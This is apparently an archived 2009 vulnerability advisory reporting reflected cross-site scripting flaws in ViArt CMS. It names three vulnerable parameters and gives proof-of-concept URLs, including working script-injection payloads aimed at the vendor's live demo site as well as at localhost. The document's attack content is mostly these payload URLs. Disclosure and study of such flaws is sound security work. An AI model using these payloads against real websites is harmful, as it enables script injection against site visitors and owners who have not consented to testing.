Home / os / win10

viartcms-xss.txt

Posted on 07 August 2009

/* _____ _ ___ __ | ____|_ _(_) / /_ _ _ _ | _| / / | | / / / _` | | | | | |___ V /| | | V V / (_| | |_| | |_____| \_/ |_|_| \_/\_/ \__,_|\__, | |___/ _____ |_ _|__ __ _ _ __ ___ | |/ _ / _` | '_ ` _ \n| | __/ (_| | | | | | | |_|\___|\__,_|_| |_| |_| ViArt CMS Remote XSS Vulnerabilities Discovered By : Moudi Contact : <m0udi@9.cn> Download : http://www.viart.com/cms/ Greetings : Mizoz, Zuka, str0ke, 599eme Man. */ [+] Exploit XSS: - Vulnerable code in forum.php (forum_id). - Vulnerable code in forums.php (category_id). - Vulnerable code in forum_topic_new.php (forum_id). - Poc: http://127.0.0.1/forum.php?forum_id=[XSS] http://127.0.0.1/forums.php?category_id=[XSS] http://127.0.0.1/forum_topic_new.php?forum_id=[XSS] http://www.viart.com/cms-demo/forum.php?forum_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt> http://www.viart.com/cms-demo/forums.php?category_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt> http://www.viart.com/cms-demo/forum_topic_new.php?forum_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>

 

TOP